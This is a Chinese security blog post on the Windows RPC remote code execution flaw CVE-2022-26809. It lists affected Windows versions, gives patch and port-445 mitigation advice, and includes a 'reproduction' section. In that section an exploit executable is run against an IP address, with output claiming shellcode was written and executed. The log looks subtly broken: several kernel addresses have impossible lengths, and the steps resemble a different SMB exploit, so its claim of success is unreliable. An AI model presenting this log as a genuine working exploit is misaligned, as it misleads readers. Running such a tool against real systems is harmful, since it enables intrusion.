![Windows远程代码执行(CVE-2022-26809)]( "Windows远程代码执行(CVE-2022-26809)")
点击蓝字 关注我们
![Windows远程代码执行(CVE-2022-26809)]( "Windows远程代码执行(CVE-2022-26809)")
点击蓝字 关注我们
声明
本文作者:CKCsec安全研究院
本文字数:1190
阅读时长:3 分钟
项目/链接:文末获取
本文属于【CKCsec安全研究院】原创文章,未经许可禁止转载
声明
本文作者:CKCsec安全研究院
本文字数:1190
阅读时长:3 分钟
项目/链接:文末获取
本文属于【CKCsec安全研究院】原创文章,未经许可禁止转载
Windows远程代码执行(CVE-2022-26809)
遵纪守法
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益
漏洞描述
CVE-2022-26809 - 核心 Windows 组件 (RPC) 的弱点获得 9.8 的 CVSS 分数并非没有原因,因为攻击不需要身份验证并且可以通过网络远程执行,并且可能导致远程代码执行 ( RCE) 具有 RPC 服务的权限,这取决于托管 RPC 运行时的进程。运气好的话,这个严重的错误允许访问运行 SMB 的未打补丁的 Windows 主机。该漏洞既可以从网络外部被利用以破坏它,也可以在网络中的机器之间被利用。
风险等级
高
影响版本
适用于 32 位系统的
Windows 10 适用于基于 x64 的系统的
Windows 10 版本 1607 适用于 32 位系统的
Windows 10 版本 1607 适用于基于 x64 的系统
适用于 32 位系统的
Windows 10 版本 1809 适用于基于 ARM64 的系统的 Windows 10 版本 1809
Windows 10 版本 1809,用于基于 x64 的系统
Windows 10 版本 1909,用于 32 位系统
Windows 10 版本 1909,用于基于 ARM64 的系统
Windows 10 版本 1909,用于基于 x64 的系统
Windows 10 版本 20H2,用于 32 位系统
Windows 10 版本 20H2,用于基于 ARM64 的系统
适用于基于 x64 的系统的 Windows 10 版本 20H2 适用
于 32 位系统的
Windows 10 版本 21H1 适用于基于 ARM64 的系统的 Windows 10 版本 21H1
Windows 10 版本 21H1,用于基于 x64 的系统
Windows 10 版本 21H2,用于 32 位系统
Windows 10 版本 21H2,用于基于 ARM64 的系统
Windows 10 版本 21H2,用于基于 x64 的系统
Windows 11,用于基于 ARM64 的系统
Windows 11,用于基于 x64 的系统
适用于 32 位系统的
Windows 7 Service Pack 1 适用于基于 x64 的系统的 Windows 7 Service Pack 1
适用于 32 位系统的
Windows 8.1 适用于基于 x64 的系统的
Windows RT 8.1
适用于 32 位系统的 Windows Server 2008 Service Pack 2
Windows Server 2008 用于 32 位系统 Service Pack 2(服务器核心安装)
Windows Server 2008 用于基于 x64 的系统 Service Pack 2
Windows Server 2008,用于基于 x64 的系统 Service Pack 2(服务器核心安装)
Windows Server 2008 R2,用于基于 x64 的系统 Service Pack 1
Windows Server 2008 R2,用于基于 x64 的系统 Service Pack 1(服务器核心安装)
Windows Server 2012
Windows Server 2012(服务器核心安装)
Windows Server 2012 R2
Windows Server 2012 R2(服务器核心安装)
Windows Server 2016
Windows Server 2016(服务器核心安装)
Windows Server 2019
Windows Server 2019(服务器核心安装)
Windows Server 2022
Windows Server 2022(服务器核心)安装)
Windows Server,版本 20H2(服务器核心安装)
漏洞复现
CVE-2022-26809 ip 端口
C:>CVE-2022-26809.exe 192.168.10.110 445
CVE-2022-26809 RPC Remote Exploit
[+] Checking... 192.168.10.110 445
[+] 192.168.10.110 445 IsOpen
[+] found low stub at phys addr 6800!
[+] Pipe at 4ac660
[+] base of RPC heap at fffff79480048033
[+] ntoskrnl entry at fffff802435782060
[+] found Pipe self-ref entry 1eb
[+] found Alsr at fffff64480301671
[+] found RPC CALL at fffff802451b3b30
[+] load shellcode.bin
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff4ffc0033060
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff75006070a023!
[+] Try to execute shellcode!
[ ] Exploit Suceess!
修复建议
1.目前微软官方已针对此漏洞释出更新程式,请各机关联络维护厂商或参考下列网址进行更新:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809 2.若无法更新至最新版本,请参考微软官方网页之「Mitigations」一节,采取下列缓解措施:(1)关闭边界防火墙的TCP 445埠。(2)参考下列官方指引保护SMB流量:https://docs.microsoft.com/zh-tw/windows-server/storage/file-server/smb-secure-traffic
上面教程仅供个人学习交流,旨在为网络安全发展贡献力量,切勿用于非法用途,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
原文始发于微信公众号(CKCsec安全研究院):Windows远程代码执行(CVE-2022-26809)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论